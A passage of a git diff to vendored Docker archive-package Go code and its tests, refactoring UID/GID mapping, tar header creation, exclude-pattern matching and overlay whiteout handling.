+ pipeWriter.Close() + + }() + return pipeReader +} + // Extension returns the extension of a file that uses the specified compression algorithm. func (compression *Compression) Extension() string { switch *compression { @@ -240,6 +353,67 @@ func (compression *Compression) Extension() string { return "" } +// FileInfoHeader creates a populated Header from fi. +// Compared to archive pkg this function fills in more information. +// Also, regardless of Go version, this function fills file type bits (e.g. hdr.Mode |= modeISDIR), +// which have been deleted since Go 1.9 archive/tar. +func FileInfoHeader(name string, fi os.FileInfo, link string) (*tar.Header, error) { + hdr, err := tar.FileInfoHeader(fi, link) + if err != nil { + return nil, err + } + hdr.Format = tar.FormatPAX + hdr.ModTime = hdr.ModTime.Truncate(time.Second) + hdr.AccessTime = time.Time{} + hdr.ChangeTime = time.Time{} + hdr.Mode = fillGo18FileTypeBits(int64(chmodTarEntry(os.FileMode(hdr.Mode))), fi) + name, err = canonicalTarName(name, fi.IsDir()) + if err != nil { + return nil, fmt.Errorf("tar: cannot canonicalize path: %v", err) + } + hdr.Name = name + if err := setHeaderForSpecialDevice(hdr, name, fi.Sys()); err != nil { + return nil, err + } + return hdr, nil +} + +// fillGo18FileTypeBits fills type bits which have been removed on Go 1.9 archive/tar +// https://github.com/golang/go/commit/66b5a2f +func fillGo18FileTypeBits(mode int64, fi os.FileInfo) int64 { + fm := fi.Mode() + switch { + case fm.IsRegular(): + mode |= modeISREG + case fi.IsDir(): + mode |= modeISDIR + case fm&os.ModeSymlink != 0: + mode |= modeISLNK + case fm&os.ModeDevice != 0: + if fm&os.ModeCharDevice != 0 { + mode |= modeISCHR + } else { + mode |= modeISBLK + } + case fm&os.ModeNamedPipe != 0: + mode |= modeISFIFO + case fm&os.ModeSocket != 0: + mode |= modeISSOCK + } + return mode +} + +// ReadSecurityXattrToTarHeader reads security.capability xattr from filesystem +// to a tar header +func ReadSecurityXattrToTarHeader(path 
string, hdr *tar.Header) error { + capability, _ := system.Lgetxattr(path, "security.capability") + if capability != nil { + hdr.Xattrs = make(map[string]string) + hdr.Xattrs["security.capability"] = string(capability) + } + return nil +} + type tarWhiteoutConverter interface { ConvertWrite(*tar.Header, string, os.FileInfo) (*tar.Header, error) ConvertRead(*tar.Header, string) (bool, error) @@ -250,9 +424,9 @@ type tarAppender struct { Buffer *bufio.Writer // for hardlink mapping - SeenFiles map[uint64]string - UIDMaps []idtools.IDMap - GIDMaps []idtools.IDMap + SeenFiles map[uint64]string + IDMappings *idtools.IDMappings + ChownOpts *idtools.IDPair // For packing and unpacking whiteout files in the // non standard format. The whiteout files defined @@ -261,6 +435,16 @@ type tarAppender struct { WhiteoutConverter tarWhiteoutConverter } +func newTarAppender(idMapping *idtools.IDMappings, writer io.Writer, chownOpts *idtools.IDPair) *tarAppender { + return &tarAppender{ + SeenFiles: make(map[uint64]string), + TarWriter: tar.NewWriter(writer), + Buffer: pools.BufioWriter32KPool.Get(nil), + IDMappings: idMapping, + ChownOpts: chownOpts, + } +} + // canonicalTarName provides a platform-independent and consistent posix-style //path for files and directories to be archived regardless of the platform. 
func canonicalTarName(name string, isDir bool) (string, error) { @@ -283,33 +467,30 @@ func (ta *tarAppender) addTarFile(path, name string) error { return err } - link := "" + var link string if fi.Mode()&os.ModeSymlink != 0 { - if link, err = os.Readlink(path); err != nil { + var err error + link, err = os.Readlink(path) + if err != nil { return err } } - hdr, err := tar.FileInfoHeader(fi, link) + hdr, err := FileInfoHeader(name, fi, link) if err != nil { return err } - hdr.Mode = int64(chmodTarEntry(os.FileMode(hdr.Mode))) - - name, err = canonicalTarName(name, fi.IsDir()) - if err != nil { - return fmt.Errorf("tar: cannot canonicalize path: %v", err) - } - hdr.Name = name - - inode, err := setHeaderForSpecialDevice(hdr, ta, name, fi.Sys()) - if err != nil { + if err := ReadSecurityXattrToTarHeader(path, hdr); err != nil { return err } // if it's not a directory and has more than 1 link, // it's hard linked, so set the type flag accordingly if !fi.IsDir() && hasHardlinks(fi) { + inode, err := getInodeFromStat(fi.Sys()) + if err != nil { + return err + } // a link should have a name that it links too // and that linked name should be first in the tar archive if oldpath, ok := ta.SeenFiles[inode]; ok { @@ -321,30 +502,30 @@ func (ta *tarAppender) addTarFile(path, name string) error { } } - capability, _ := system.Lgetxattr(path, "security.capability") - if capability != nil { - hdr.Xattrs = make(map[string]string) - hdr.Xattrs["security.capability"] = string(capability) - } + //check whether the file is overlayfs whiteout + //if yes, skip re-mapping container ID mappings. + isOverlayWhiteout := fi.Mode()&os.ModeCharDevice != 0 && hdr.Devmajor == 0 && hdr.Devminor == 0 //handle re-mapping container ID mappings back to host ID mappings before //writing tar headers/files. 
We skip whiteout files because they were written //by the kernel and already have proper ownership relative to the host - if !strings.HasPrefix(filepath.Base(hdr.Name), WhiteoutPrefix) && (ta.UIDMaps != nil || ta.GIDMaps != nil) { - uid, gid, err := getFileUIDGID(fi.Sys()) - if err != nil { - return err - } - xUID, err := idtools.ToContainer(uid, ta.UIDMaps) + if !isOverlayWhiteout && + !strings.HasPrefix(filepath.Base(hdr.Name), WhiteoutPrefix) && + !ta.IDMappings.Empty() { + fileIDPair, err := getFileUIDGID(fi.Sys()) if err != nil { return err } - xGID, err := idtools.ToContainer(gid, ta.GIDMaps) + hdr.Uid, hdr.Gid, err = ta.IDMappings.ToContainer(fileIDPair) if err != nil { return err } - hdr.Uid = xUID - hdr.Gid = xGID + } + + // explicitly override with ChownOpts + if ta.ChownOpts != nil { + hdr.Uid = ta.ChownOpts.UID + hdr.Gid = ta.ChownOpts.GID } if ta.WhiteoutConverter != nil { @@ -398,7 +579,7 @@ func (ta *tarAppender) addTarFile(path, name string) error { return nil } -func createTarFile(path, extractDir string, hdr *tar.Header, reader io.Reader, Lchown bool, chownOpts *TarChownOptions, inUserns bool) error { +func createTarFile(path, extractDir string, hdr *tar.Header, reader io.Reader, Lchown bool, chownOpts *idtools.IDPair, inUserns bool) error { // hdr.Mode is in linux format, which we can use for sycalls, // but for os.Foo() calls we need the mode converted to os.FileMode, // so use hdrInfo.Mode() (they differ for e.g. setuid bits) @@ -472,13 +653,13 @@ func createTarFile(path, extractDir string, hdr *tar.Header, reader io.Reader, L return nil default: - return fmt.Errorf("Unhandled tar header type %d\n", hdr.Typeflag) + return fmt.Errorf("unhandled tar header type %d", hdr.Typeflag) } // Lchown is not supported on Windows. 
if Lchown && runtime.GOOS != "windows" { if chownOpts == nil { - chownOpts = &TarChownOptions{UID: hdr.Uid, GID: hdr.Gid} + chownOpts = &idtools.IDPair{UID: hdr.Uid, GID: hdr.Gid} } if err := os.Lchown(path, chownOpts.UID, chownOpts.GID); err != nil { return err @@ -553,8 +734,7 @@ func TarWithOptions(srcPath string, options *TarOptions) (io.ReadCloser, error) // on platforms other than Windows. srcPath = fixVolumePathPrefix(srcPath) - patterns, patDirs, exceptions, err := fileutils.CleanPatterns(options.ExcludePatterns) - + pm, err := fileutils.NewPatternMatcher(options.ExcludePatterns) if err != nil { return nil, err } @@ -567,14 +747,12 @@ func TarWithOptions(srcPath string, options *TarOptions) (io.ReadCloser, error) } go func() { - ta := &tarAppender{ - TarWriter: tar.NewWriter(compressWriter), - Buffer: pools.BufioWriter32KPool.Get(nil), - SeenFiles: make(map[uint64]string), - UIDMaps: options.UIDMaps, - GIDMaps: options.GIDMaps, - WhiteoutConverter: getWhiteoutConverter(options.WhiteoutFormat), - } + ta := newTarAppender( + idtools.NewIDMappingsFromMaps(options.UIDMaps, options.GIDMaps), + compressWriter, + options.ChownOpts, + ) + ta.WhiteoutConverter = getWhiteoutConverter(options.WhiteoutFormat) defer func() { // Make sure to check the error on Close. 
@@ -651,7 +829,7 @@ func TarWithOptions(srcPath string, options *TarOptions) (io.ReadCloser, error) // is asking for that file no matter what - which is true // for some files, like .dockerignore and Dockerfile (sometimes) if include != relFilePath { - skip, err = fileutils.OptimizedMatches(relFilePath, patterns, patDirs) + skip, err = pm.Matches(relFilePath) if err != nil { logrus.Errorf("Error matching %s: %v", relFilePath, err) return err @@ -661,7 +839,7 @@ func TarWithOptions(srcPath string, options *TarOptions) (io.ReadCloser, error) if skip { // If we want to skip this file and its a directory // then we should first check to see if there's an - // excludes pattern (eg !dir/file) that starts with this + // excludes pattern (e.g. !dir/file) that starts with this // dir. If so then we can't skip this dir. // Its not a dir then so we can just return/skip. @@ -670,18 +848,17 @@ func TarWithOptions(srcPath string, options *TarOptions) (io.ReadCloser, error) } // No exceptions (!...) in patterns so just skip dir - if !exceptions { + if !pm.Exclusions() { return filepath.SkipDir } dirSlash := relFilePath + string(filepath.Separator) - for _, pat := range patterns { - if pat[0] != '!' 
{ + for _, pat := range pm.Patterns() { + if !pat.Exclusion() { continue } - pat = pat[1:] + string(filepath.Separator) - if strings.HasPrefix(pat, dirSlash) { + if strings.HasPrefix(pat.String()+string(filepath.Separator), dirSlash) { // found a match - so can't skip this dir return nil } @@ -731,10 +908,8 @@ func Unpack(decompressedArchive io.Reader, dest string, options *TarOptions) err defer pools.BufioReader32KPool.Put(trBuf) var dirs []*tar.Header - remappedRootUID, remappedRootGID, err := idtools.GetRootUIDGID(options.UIDMaps, options.GIDMaps) - if err != nil { - return err - } + idMappings := idtools.NewIDMappingsFromMaps(options.UIDMaps, options.GIDMaps) + rootIDs := idMappings.RootPair() whiteoutConverter := getWhiteoutConverter(options.WhiteoutFormat) // Iterate through the files in the archive. @@ -768,7 +943,7 @@ loop: parent := filepath.Dir(hdr.Name) parentPath := filepath.Join(dest, parent) if _, err := os.Lstat(parentPath); err != nil && os.IsNotExist(err) { - err = idtools.MkdirAllNewAs(parentPath, 0777, remappedRootUID, remappedRootGID) + err = idtools.MkdirAllAndChownNew(parentPath, 0777, rootIDs) if err != nil { return err } @@ -813,26 +988,8 @@ loop: } trBuf.Reset(tr) - // if the options contain a uid & gid maps, convert header uid/gid - // entries using the maps such that lchown sets the proper mapped - // uid/gid after writing the file. We only perform this mapping if - // the file isn't already owned by the remapped root UID or GID, as - // that specific uid/gid has no mapping from container -> host, and - // those files already have the proper ownership for inside the - // container. 
- if hdr.Uid != remappedRootUID { - xUID, err := idtools.ToHost(hdr.Uid, options.UIDMaps) - if err != nil { - return err - } - hdr.Uid = xUID - } - if hdr.Gid != remappedRootGID { - xGID, err := idtools.ToHost(hdr.Gid, options.GIDMaps) - if err != nil { - return err - } - hdr.Gid = xGID + if err := remapIDs(idMappings, hdr); err != nil { + return err } if whiteoutConverter != nil { @@ -917,23 +1074,13 @@ func (archiver *Archiver) TarUntar(src, dst string) error { return err } defer archive.Close() - - var options *TarOptions - if archiver.UIDMaps != nil || archiver.GIDMaps != nil { - options = &TarOptions{ - UIDMaps: archiver.UIDMaps, - GIDMaps: archiver.GIDMaps, - } + options := &TarOptions{ + UIDMaps: archiver.IDMappingsVar.UIDs(), + GIDMaps: archiver.IDMappingsVar.GIDs(), } return archiver.Untar(archive, dst, options) } -// TarUntar is a convenience function which calls Tar and Untar, with the output of one piped into the other. -// If either Tar or Untar fails, TarUntar aborts and returns the error. -func TarUntar(src, dst string) error { - return defaultArchiver.TarUntar(src, dst) -} - // UntarPath untar a file from path to a destination, src is the source tar file path. func (archiver *Archiver) UntarPath(src, dst string) error { archive, err := os.Open(src) @@ -941,22 +1088,13 @@ func (archiver *Archiver) UntarPath(src, dst string) error { return err } defer archive.Close() - var options *TarOptions - if archiver.UIDMaps != nil || archiver.GIDMaps != nil { - options = &TarOptions{ - UIDMaps: archiver.UIDMaps, - GIDMaps: archiver.GIDMaps, - } + options := &TarOptions{ + UIDMaps: archiver.IDMappingsVar.UIDs(), + GIDMaps: archiver.IDMappingsVar.GIDs(), } return archiver.Untar(archive, dst, options) } -// UntarPath is a convenience function which looks for an archive -// at filesystem path `src`, and unpacks it at `dst`. 
-func UntarPath(src, dst string) error { - return defaultArchiver.UntarPath(src, dst) -} - // CopyWithTar creates a tar archive of filesystem path `src`, and // unpacks it at filesystem path `dst`. // The archive is streamed directly with fixed buffering and no @@ -970,30 +1108,19 @@ func (archiver *Archiver) CopyWithTar(src, dst string) error { return archiver.CopyFileWithTar(src, dst) } - // if this archiver is set up with ID mapping we need to create + // if this Archiver is set up with ID mapping we need to create // the new destination directory with the remapped root UID/GID pair // as owner - rootUID, rootGID, err := idtools.GetRootUIDGID(archiver.UIDMaps, archiver.GIDMaps) - if err != nil { - return err - } + rootIDs := archiver.IDMappingsVar.RootPair() // Create dst, copy src's content into it logrus.Debugf("Creating dest directory: %s", dst) - if err := idtools.MkdirAllNewAs(dst, 0755, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChownNew(dst, 0755, rootIDs); err != nil { return err } logrus.Debugf("Calling TarUntar(%s, %s)", src, dst) return archiver.TarUntar(src, dst) } -// CopyWithTar creates a tar archive of filesystem path `src`, and -// unpacks it at filesystem path `dst`. -// The archive is streamed directly with fixed buffering and no -// intermediary disk IO. -func CopyWithTar(src, dst string) error { - return defaultArchiver.CopyWithTar(src, dst) -} - // CopyFileWithTar emulates the behavior of the 'cp' command-line // for a single file. It copies a regular file from path `src` to // path `dst`, and preserves all its metadata. 
@@ -1014,59 +1141,51 @@ func (archiver *Archiver) CopyFileWithTar(src, dst string) (err error) { dst = filepath.Join(dst, filepath.Base(src)) } // Create the holding directory if necessary - if err := system.MkdirAll(filepath.Dir(dst), 0700); err != nil { + if err := system.MkdirAll(filepath.Dir(dst), 0700, ""); err != nil { return err } r, w := io.Pipe() - errC := promise.Go(func() error { - defer w.Close() + errC := make(chan error, 1) - srcF, err := os.Open(src) - if err != nil { - return err - } - defer srcF.Close() + go func() { + defer close(errC) - hdr, err := tar.FileInfoHeader(srcSt, "") - if err != nil { - return err - } - hdr.Name = filepath.Base(dst) - hdr.Mode = int64(chmodTarEntry(os.FileMode(hdr.Mode))) + errC <- func() error { + defer w.Close() - remappedRootUID, remappedRootGID, err := idtools.GetRootUIDGID(archiver.UIDMaps, archiver.GIDMaps) - if err != nil { - return err - } - - // only perform mapping if the file being copied isn't already owned by the - // uid or gid of the remapped root in the container - if remappedRootUID != hdr.Uid { - xUID, err := idtools.ToHost(hdr.Uid, archiver.UIDMaps) + srcF, err := os.Open(src) if err != nil { return err } - hdr.Uid = xUID - } - if remappedRootGID != hdr.Gid { - xGID, err := idtools.ToHost(hdr.Gid, archiver.GIDMaps) + defer srcF.Close() + + hdr, err := tar.FileInfoHeader(srcSt, "") if err != nil { return err } - hdr.Gid = xGID - } + hdr.Format = tar.FormatPAX + hdr.ModTime = hdr.ModTime.Truncate(time.Second) + hdr.AccessTime = time.Time{} + hdr.ChangeTime = time.Time{} + hdr.Name = filepath.Base(dst) + hdr.Mode = int64(chmodTarEntry(os.FileMode(hdr.Mode))) + + if err := remapIDs(archiver.IDMappingsVar, hdr); err != nil { + return err + } - tw := tar.NewWriter(w) - defer tw.Close() - if err := tw.WriteHeader(hdr); err != nil { - return err - } - if _, err := io.Copy(tw, srcF); err != nil { - return err - } - return nil - }) + tw := tar.NewWriter(w) + defer tw.Close() + if err := tw.WriteHeader(hdr); 
err != nil { + return err + } + if _, err := io.Copy(tw, srcF); err != nil { + return err + } + return nil + }() + }() defer func() { if er := <-errC; err == nil && er != nil { err = er @@ -1080,23 +1199,21 @@ func (archiver *Archiver) CopyFileWithTar(src, dst string) (err error) { return err } -// CopyFileWithTar emulates the behavior of the 'cp' command-line -// for a single file. It copies a regular file from path `src` to -// path `dst`, and preserves all its metadata. -// -// Destination handling is in an operating specific manner depending -// where the daemon is running. If `dst` ends with a trailing slash -// the final destination path will be `dst/base(src)` (Linux) or -// `dst\base(src)` (Windows). -func CopyFileWithTar(src, dst string) (err error) { - return defaultArchiver.CopyFileWithTar(src, dst) +// IDMappings returns the IDMappings of the archiver. +func (archiver *Archiver) IDMappings() *idtools.IDMappings { + return archiver.IDMappingsVar +} + +func remapIDs(idMappings *idtools.IDMappings, hdr *tar.Header) error { + ids, err := idMappings.ToHost(idtools.IDPair{UID: hdr.Uid, GID: hdr.Gid}) + hdr.Uid, hdr.Gid = ids.UID, ids.GID + return err } // cmdStream executes a command, and returns its stdout as a stream. // If the command fails to run or doesn't complete successfully, an error // will be returned, including anything written on stderr. 
-func cmdStream(cmd *exec.Cmd, input io.Reader) (io.ReadCloser, <-chan struct{}, error) { - chdone := make(chan struct{}) +func cmdStream(cmd *exec.Cmd, input io.Reader) (io.ReadCloser, error) { cmd.Stdin = input pipeR, pipeW := io.Pipe() cmd.Stdout = pipeW @@ -1105,7 +1222,7 @@ func cmdStream(cmd *exec.Cmd, input io.Reader) (io.ReadCloser, <-chan struct{}, // Run the command and return the pipe if err := cmd.Start(); err != nil { - return nil, nil, err + return nil, err } // Copy stdout to the returned pipe @@ -1115,10 +1232,9 @@ func cmdStream(cmd *exec.Cmd, input io.Reader) (io.ReadCloser, <-chan struct{}, } else { pipeW.Close() } - close(chdone) }() - return pipeR, chdone, nil + return pipeR, nil } // NewTempArchive reads the content of src into a temporary file, and returns the contents diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_linux.go b/vendor/github.com/docker/docker/pkg/archive/archive_linux.go index 6b2a31ff1f..970d4d0680 100644 --- a/vendor/github.com/docker/docker/pkg/archive/archive_linux.go +++ b/vendor/github.com/docker/docker/pkg/archive/archive_linux.go @@ -1,13 +1,13 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" "os" "path/filepath" "strings" - "syscall" "github.com/docker/docker/pkg/system" + "golang.org/x/sys/unix" ) func getWhiteoutConverter(format WhiteoutFormat) tarWhiteoutConverter { @@ -67,12 +67,9 @@ func (overlayWhiteoutConverter) ConvertRead(hdr *tar.Header, path string) (bool, // if a directory is marked as opaque by the AUFS special file, we need to translate that to overlay if base == WhiteoutOpaqueDir { - if err := syscall.Setxattr(dir, "trusted.overlay.opaque", []byte{'y'}, 0); err != nil { - return false, err - } - + err := unix.Setxattr(dir, "trusted.overlay.opaque", []byte{'y'}, 0) // don't write the file itself - return false, nil + return false, err } // if a file was deleted and we are using overlay, we need to create a character device @@ 
-80,7 +77,7 @@ func (overlayWhiteoutConverter) ConvertRead(hdr *tar.Header, path string) (bool, originalBase := base[len(WhiteoutPrefix):] originalPath := filepath.Join(dir, originalBase) - if err := syscall.Mknod(originalPath, syscall.S_IFCHR, 0); err != nil { + if err := unix.Mknod(originalPath, unix.S_IFCHR, 0); err != nil { return false, err } if err := os.Chown(originalPath, hdr.Uid, hdr.Gid); err != nil { diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go index d5f046e9df..9422269dff 100644 --- a/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go +++ b/vendor/github.com/docker/docker/pkg/archive/archive_linux_test.go @@ -1,4 +1,4 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "io/ioutil" @@ -8,6 +8,9 @@ import ( "testing" "github.com/docker/docker/pkg/system" + "golang.org/x/sys/unix" + "gotest.tools/assert" + "gotest.tools/skip" ) // setupOverlayTestDir creates files in a directory with overlay whiteouts @@ -20,47 +23,39 @@ import ( // └── d3 # 0700 // └── f1 # whiteout, 0644 func setupOverlayTestDir(t *testing.T, src string) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") // Create opaque directory containing single file and permission 0700 - if err := os.Mkdir(filepath.Join(src, "d1"), 0700); err != nil { - t.Fatal(err) - } + err := os.Mkdir(filepath.Join(src, "d1"), 0700) + assert.NilError(t, err) - if err := system.Lsetxattr(filepath.Join(src, "d1"), "trusted.overlay.opaque", []byte("y"), 0); err != nil { - t.Fatal(err) - } + err = system.Lsetxattr(filepath.Join(src, "d1"), "trusted.overlay.opaque", []byte("y"), 0) + assert.NilError(t, err) - if err := ioutil.WriteFile(filepath.Join(src, "d1", "f1"), []byte{}, 0600); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(filepath.Join(src, "d1", "f1"), []byte{}, 0600) + assert.NilError(t, err) // Create another opaque 
directory containing single file but with permission 0750 - if err := os.Mkdir(filepath.Join(src, "d2"), 0750); err != nil { - t.Fatal(err) - } + err = os.Mkdir(filepath.Join(src, "d2"), 0750) + assert.NilError(t, err) - if err := system.Lsetxattr(filepath.Join(src, "d2"), "trusted.overlay.opaque", []byte("y"), 0); err != nil { - t.Fatal(err) - } + err = system.Lsetxattr(filepath.Join(src, "d2"), "trusted.overlay.opaque", []byte("y"), 0) + assert.NilError(t, err) - if err := ioutil.WriteFile(filepath.Join(src, "d2", "f1"), []byte{}, 0660); err != nil { - t.Fatal(err) - } + err = ioutil.WriteFile(filepath.Join(src, "d2", "f1"), []byte{}, 0660) + assert.NilError(t, err) // Create regular directory with deleted file - if err := os.Mkdir(filepath.Join(src, "d3"), 0700); err != nil { - t.Fatal(err) - } + err = os.Mkdir(filepath.Join(src, "d3"), 0700) + assert.NilError(t, err) - if err := system.Mknod(filepath.Join(src, "d3", "f1"), syscall.S_IFCHR, 0); err != nil { - t.Fatal(err) - } + err = system.Mknod(filepath.Join(src, "d3", "f1"), unix.S_IFCHR, 0) + assert.NilError(t, err) } func checkOpaqueness(t *testing.T, path string, opaque string) { xattrOpaque, err := system.Lgetxattr(path, "trusted.overlay.opaque") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + if string(xattrOpaque) != opaque { t.Fatalf("Unexpected opaque value: %q, expected %q", string(xattrOpaque), opaque) } @@ -69,9 +64,8 @@ func checkOpaqueness(t *testing.T, path string, opaque string) { func checkOverlayWhiteout(t *testing.T, path string) { stat, err := os.Stat(path) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + statT, ok := stat.Sys().(*syscall.Stat_t) if !ok { t.Fatalf("Unexpected type: %t, expected *syscall.Stat_t", stat.Sys()) @@ -83,9 +77,8 @@ func checkOverlayWhiteout(t *testing.T, path string) { func checkFileMode(t *testing.T, path string, perm os.FileMode) { stat, err := os.Stat(path) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + if 
stat.Mode() != perm { t.Fatalf("Unexpected file mode for %s: %o, expected %o", path, stat.Mode(), perm) } @@ -93,23 +86,17 @@ func checkFileMode(t *testing.T, path string, perm os.FileMode) { func TestOverlayTarUntar(t *testing.T) { oldmask, err := system.Umask(0) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer system.Umask(oldmask) src, err := ioutil.TempDir("", "docker-test-overlay-tar-src") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(src) setupOverlayTestDir(t, src) dst, err := ioutil.TempDir("", "docker-test-overlay-tar-dst") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(dst) options := &TarOptions{ @@ -117,14 +104,11 @@ func TestOverlayTarUntar(t *testing.T) { WhiteoutFormat: OverlayWhiteoutFormat, } archive, err := TarWithOptions(src, options) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer archive.Close() - if err := Untar(archive, dst, options); err != nil { - t.Fatal(err) - } + err = Untar(archive, dst, options) + assert.NilError(t, err) checkFileMode(t, filepath.Join(dst, "d1"), 0700|os.ModeDir) checkFileMode(t, filepath.Join(dst, "d2"), 0750|os.ModeDir) @@ -141,40 +125,31 @@ func TestOverlayTarUntar(t *testing.T) { func TestOverlayTarAUFSUntar(t *testing.T) { oldmask, err := system.Umask(0) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer system.Umask(oldmask) src, err := ioutil.TempDir("", "docker-test-overlay-tar-src") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(src) setupOverlayTestDir(t, src) dst, err := ioutil.TempDir("", "docker-test-overlay-tar-dst") - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer os.RemoveAll(dst) archive, err := TarWithOptions(src, &TarOptions{ Compression: Uncompressed, WhiteoutFormat: OverlayWhiteoutFormat, }) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) defer archive.Close() - if err := Untar(archive, dst, 
&TarOptions{ + err = Untar(archive, dst, &TarOptions{ Compression: Uncompressed, WhiteoutFormat: AUFSWhiteoutFormat, - }); err != nil { - t.Fatal(err) - } + }) + assert.NilError(t, err) checkFileMode(t, filepath.Join(dst, "d1"), 0700|os.ModeDir) checkFileMode(t, filepath.Join(dst, "d1", WhiteoutOpaqueDir), 0700) diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_other.go b/vendor/github.com/docker/docker/pkg/archive/archive_other.go index 54acbf2856..462dfc6323 100644 --- a/vendor/github.com/docker/docker/pkg/archive/archive_other.go +++ b/vendor/github.com/docker/docker/pkg/archive/archive_other.go @@ -1,6 +1,6 @@ // +build !linux -package archive +package archive // import "github.com/docker/docker/pkg/archive" func getWhiteoutConverter(format WhiteoutFormat) tarWhiteoutConverter { return nil diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_test.go index b883be33ed..9f06af9969 100644 --- a/vendor/github.com/docker/docker/pkg/archive/archive_test.go +++ b/vendor/github.com/docker/docker/pkg/archive/archive_test.go @@ -1,18 +1,26 @@ -package archive +package archive // import "github.com/docker/docker/pkg/archive" import ( "archive/tar" "bytes" + "compress/gzip" "fmt" "io" "io/ioutil" "os" "os/exec" "path/filepath" + "reflect" "runtime" "strings" "testing" "time" + + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/ioutils" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" ) var tmp string @@ -24,35 +32,22 @@ func init() { } } -func TestIsArchiveNilHeader(t *testing.T) { - out := IsArchive(nil) - if out { - t.Fatalf("isArchive should return false as nil is not a valid archive header") - } +var defaultArchiver = NewDefaultArchiver() + +func defaultTarUntar(src, dst string) error { + return defaultArchiver.TarUntar(src, dst) } -func TestIsArchiveInvalidHeader(t *testing.T) { - header := []byte{0x00, 0x01, 0x02} - out := 
IsArchive(header) - if out { - t.Fatalf("isArchive should return false as %s is not a valid archive header", header) - } +func defaultUntarPath(src, dst string) error { + return defaultArchiver.UntarPath(src, dst) } -func TestIsArchiveBzip2(t *testing.T) { - header := []byte{0x42, 0x5A, 0x68} - out := IsArchive(header) - if !out { - t.Fatalf("isArchive should return true as %s is a bz2 header", header) - } +func defaultCopyFileWithTar(src, dst string) (err error) { + return defaultArchiver.CopyFileWithTar(src, dst) } -func TestIsArchive7zip(t *testing.T) { - header := []byte{0x50, 0x4b, 0x03, 0x04} - out := IsArchive(header) - if out { - t.Fatalf("isArchive should return false as %s is a 7z header and it is not supported", header) - } +func defaultCopyWithTar(src, dst string) error { + return defaultArchiver.CopyWithTar(src, dst) } func TestIsArchivePathDir(t *testing.T) { @@ -81,12 +76,7 @@ func TestIsArchivePathInvalidFile(t *testing.T) { } func TestIsArchivePathTar(t *testing.T) { - var whichTar string - if runtime.GOOS == "solaris" { - whichTar = "gtar" - } else { - whichTar = "tar" - } + whichTar := "tar" cmdStr := fmt.Sprintf("touch /tmp/archivedata && %s -cf /tmp/archive /tmp/archivedata && gzip --stdout /tmp/archive > /tmp/archive.gz", whichTar) cmd := exec.Command("sh", "-c", cmdStr) output, err := cmd.CombinedOutput() @@ -101,7 +91,7 @@ func TestIsArchivePathTar(t *testing.T) { } } -func testDecompressStream(t *testing.T, ext, compressCommand string) { +func testDecompressStream(t *testing.T, ext, compressCommand string) io.Reader { cmd := exec.Command("sh", "-c", fmt.Sprintf("touch /tmp/archive && %s /tmp/archive", compressCommand)) output, err := cmd.CombinedOutput() @@ -125,6 +115,8 @@ func testDecompressStream(t *testing.T, ext, compressCommand string) { if err = r.Close(); err != nil { t.Fatalf("Failed to close the decompressed stream: %v ", err) } + + return r } func TestDecompressStreamGzip(t *testing.T) { @@ -142,7 +134,7 @@ func 
TestDecompressStreamXz(t *testing.T) { testDecompressStream(t, "xz", "xz -f") } -func TestCompressStreamXzUnsuported(t *testing.T) { +func TestCompressStreamXzUnsupported(t *testing.T) { dest, err := os.Create(tmp + "dest") if err != nil { t.Fatalf("Fail to create the destination file") @@ -162,9 +154,9 @@ func TestCompressStreamBzip2Unsupported(t *testing.T) { } defer dest.Close() - _, err = CompressStream(dest, Xz) + _, err = CompressStream(dest, Bzip2) if err == nil { - t.Fatalf("Should fail as xz is unsupported for compression format.") + t.Fatalf("Should fail as bzip2 is unsupported for compression format.") } } @@ -207,20 +199,20 @@ func TestExtensionGzip(t *testing.T) { compression := Gzip output := compression.Extension() if output != "tar.gz" { - t.Fatalf("The extension of a bzip2 archive should be 'tar.gz'") + t.Fatalf("The extension of a gzip archive should be 'tar.gz'") } } func TestExtensionXz(t *testing.T) { compression := Xz output := compression.Extension() if output != "tar.xz" { - t.Fatalf("The extension of a bzip2 archive should be 'tar.xz'") + t.Fatalf("The extension of a xz archive should be 'tar.xz'") } } func TestCmdStreamLargeStderr(t *testing.T) { cmd := exec.Command("sh", "-c", "dd if=/dev/zero bs=1k count=1000 of=/dev/stderr; echo hello") - out, _, err := cmdStream(cmd, nil) + out, err := cmdStream(cmd, nil) if err != nil { t.Fatalf("Failed to start command: %s", err) } @@ -245,7 +237,7 @@ func TestCmdStreamBad(t *testing.T) { t.Skip("Failing on Windows CI machines") } badCmd := exec.Command("sh", "-c", "echo hello; echo >&2 error couldn\\'t reverse the phase pulser; exit 1") - out, _, err := cmdStream(badCmd, nil) + out, err := cmdStream(badCmd, nil) if err != nil { t.Fatalf("Failed to start command: %s", err) } @@ -260,7 +252,7 @@ func TestCmdStreamBad(t *testing.T) { func TestCmdStreamGood(t *testing.T) { cmd := exec.Command("sh", "-c", "echo hello; exit 0") - out, _, err := cmdStream(cmd, nil) + out, err := cmdStream(cmd, nil) if err 
